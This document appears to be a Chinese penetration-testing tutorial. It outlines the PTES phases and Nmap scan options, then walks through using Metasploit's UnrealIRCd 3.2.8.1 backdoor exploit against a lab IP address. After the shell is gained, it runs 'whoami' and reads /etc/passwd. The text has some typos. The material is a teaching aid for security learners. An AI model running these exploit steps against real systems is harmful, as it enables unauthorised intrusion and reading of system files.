Metasploit 进阶第一讲    攻击流程及命令介绍

 

01.渗透测试过程环节(PTES

 

1.前期交互阶段:与客户组织进行交互讨论,确定范围,目标等

2.情报搜集阶段:获取更多目标组织信息,NmapNessus

3.威胁建模阶段:理清头绪,确定出最可行的攻击通道

4.漏洞分析阶段:搜索可获取的渗透代码资源

5.渗透攻击阶段:找出安全漏洞,入侵系统

6.后渗透攻击阶段:你想干什么,Mctcrprctcr

7.报告阶段:渗透测试报告

 

 

 

02. Metasploit漏洞利用环节

 

情报搜集阶段

 

外围信息搜索   -    Google Hacking等

主机探测与端口扫描          -Nmap等

服务扫描       -auxiliary/scanner/tclnet/…等(见目录)

网络漏洞扫描   -OpenVAS、Nessus等

 

情报搜集阶段—Nmap

格式:nmap<扫描选项,<扫描目标>

·扫描选项:指定扫描方式      ·扫描目标:

-sn         -探测存活主机,不扫描端口                         单个p地址

-o                  -目标操作系统识别                                          多个p地址,用逗号分割(,)

-sV         -详细服务版本信息                                         连续ip地址,用连字符号(-)

-f                   -快速扫描                                                    CIDR表示,192.168.22.0/24

-sT/-sS/-sA                 -全连接/syn扫描/ack扫描,

同auxiliary/scanner/portscan/..模块

-sU                              -udp端口扫描了

-p<端口范围>           指定扫描端口

 

  

Nmap  –sV  -o  192.168.24.139

 

状态:

open 应用程序正在此端口监听

closed 主机响应,无应用程序监听

filtered 不确定是否开放

unfiltered 无法确定端口是否开放(仅出现在ack扫描时)

nmap  -A  -p  6667   192.168.24.139

 

情报搜集阶段--其他姿势

漏洞分析阶段

 

IRC:“Internet Rely Chat”的缩写,网络中继聊天,通过网络的即时交流工具。

IRC运作方式:是一种分布式的客户端/服务器的结构,一个IRC服务器内部包含多个IRC频道,这些频道和qq群类似。若频道不是保留频道且频道中无人,该频道就会消失,而想加入某个频道,若频道名不存在,则会创建这个频道,创建者为管理员,频道内部可私聊。

IRC端口:服务器端口:6667,客户端端口:6697,连接使用的是SSL。

 

1.msfconsole             -启动metasploit框架

2.search unreal ircd3.2.8.1     -在metasploit框架中查询相关模块

3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor  -查看模块信息,命名规则:模块类型/目标平台/目标服务/模块名称

4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb         -查看源代码(也可在目录中查看)

渗透攻击阶段

1.use exploit/unix/irc/unreal_ircd_3281_backdoor             -使用该模块

2.show  options    -查看需配置的参数(Required为yes的选项必须配置)

3.set  rhosts  192.168.24.139     -配置目标ip地址

4.run/exploit   -运行该模块

5.whoami;cat/etc/passwd      -成功后查看目标主机信息

 

 

Metasploit漏洞利用流程总结

 

Metasploit命令:

1.     msfconsole

2.     search相关模块

3.     use模块路径

4.     show  options

5.set <参数名称> <参数信息

6.run/exploit

7..

 

 

3.Metasploit攻击流程及命令介绍的更多相关文章

  1. git各种命令介绍以及碰到的各种坑

    一.各种命令介绍: git pull:从其他的版本库(既可以是远程的也可以是本地的)将代码更新到本地,例如:'git pull origin master'就是将origin这个版本库的代码更新到本地 ...

  2. 5.Metasploit攻击载荷深入理解

    Metasploit 进阶第三讲 深入理解攻击载荷   01 Nesus介绍.安装及使用 Nessus介绍 Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库. ...

  3. 12个Linux进程管理命令介绍(转)

    12个Linux进程管理命令介绍 [日期:2015-06-02] 来源:Linux中国  作者:Linux [字体:大 中 小]   执行中的程序在称作进程.当程序以可执行文件存放在存储中,并且运行的 ...

  4. 2.SDK目录结构和adb工具及命令介绍

    安卓开发学习笔记 1.安卓开发之环境搭建 2.SDK目录结构和adb工具及命令介绍 1.SDK目录介绍: ******************************** add-ons:Androi ...

  5. [推荐]DDOS攻击与防范知识介绍

    [推荐]DDOS攻击与防范知识介绍 DDOS攻防体系建设v0.2(淘宝-林晓曦)     http://wenku.baidu.com/view/39549a11a8114431b90dd866.ht ...

  6. tar.xz如何解压:linux和windows下tar.xz解压命令介绍

    在linux下怎么解压和压缩tar.xz文件? (本文由www.169it.com搜集整理) 在linux下解压tar.xz文件步骤 1 2 # xz -d ***.tar.xz  //先解压xz # ...

  7. 查看MySQL数据库表的命令介绍

    如果需要查看MySQL数据库中都有哪些MySQL数据库表,应该如何实现呢?下面就为您介绍查看MySQL数据库表的命令,供您参考. 进入MySQL Command line client下查看当前使用的 ...

  8. Docker学习总结之Run命令介绍

    Docker学习总结之Run命令介绍 本文由Vikings(http://www.cnblogs.com/vikings-blog/) 原创,转载请标明.谢谢! 在使用Docker时,执行最多的命令某 ...

  9. maven常用命令介绍

    mvn 3.0.4 创建maven项目命令  mvn  archetype:generate   -DgroupId=damocles-autocredit -DartifactId=damocles ...

随机推荐

  1. Flask css 无法实时更新

    css代码改完了,但是查看网页源代码css的内容还是很久之前的,根本没有更新 解决方法: 1.浏览器缓存.使用ctrl+F5刷新一下页面 2. 3. from datetime import time ...

  2. 第一个Hystrix程序 Hystrix 一

    1.导入jar包 <dependencies> <dependency> <groupId>com.netflix.hystrix</groupId> ...

  3. idea新建springboot项目

    不多说废话,直接进入正题,按照下面的步骤创建一个springboot项目一般不会出错,当然不排除可能会有一些脸黑的,不过应该问题不大. 第一步,如果你是在已有的项目里面,新建一个springboot项 ...

  4. JAVA校内赛

    第一题: 问题描述 在计算机存储中,15.125GB是多少MB?答案提交 这是一道结果填空的题,你只需要算出结果后提交即可.本题的结果为一个整数,在提交答案时只填写这个整数,填写多余的内容将无法得分. ...

  5. scrapy的扩展件extensions

    extensions.py文件 # -*- coding: utf-8 -*- # 该扩展会在以下事件时记录一条日志: # spider被打开 # spider被关闭 # 爬取了特定数量的条目(ite ...

  6. LeetCode#15 | Three Sum 三数之和

    一.题目 给你一个包含 n 个整数的数组 nums,判断 nums 中是否存在三个元素 a,b,c ,使得 a + b + c = 0 ?请你找出所有满足条件且不重复的三元组. 注意:答案中不可以包含 ...

  7. Java设计模式学习笔记三

    工厂模式 简单工厂模式(不属于23种设计模式之一) 属于创建型模式,是工厂模式的一种.简单工厂模式是由一个工厂对象决定创建出哪一种产品类的实例.简单工厂模式是工厂模式家族中最简单实用的模式: 简单工厂 ...

  8. Python - 函数形参之必填参数、缺省参数、可变参数、关键字参数的详细使用

    Python函数形参 必传参数:平时最常用的,必传确定数量的参数 缺省参数:在调用函数时可以传也可以不传,如果不传将使用默认值 可变参数:可变长度参数 关键字参数:长度可变,但是需要以kv对形式传参 ...

  9. CSS3-3D技术

    CSS3-3D技术 transform翻译成汉语具有"变换"或者"改变"的意思. 此属性具有非常强大的功能,比如可以实现元素的位移.拉伸或者旋转等效果, 最能体 ...

  10. 在Linux环境安装redis步骤,且设置开机自动启动redis

    最近在linux环境安装了redis学习,目前已经安装成功且设置开机即启动状态,我把步骤流程记录了下来,分享给需要的小伙伴. 1.我在/usr/local/localsoftware/目录下创建了一个 ...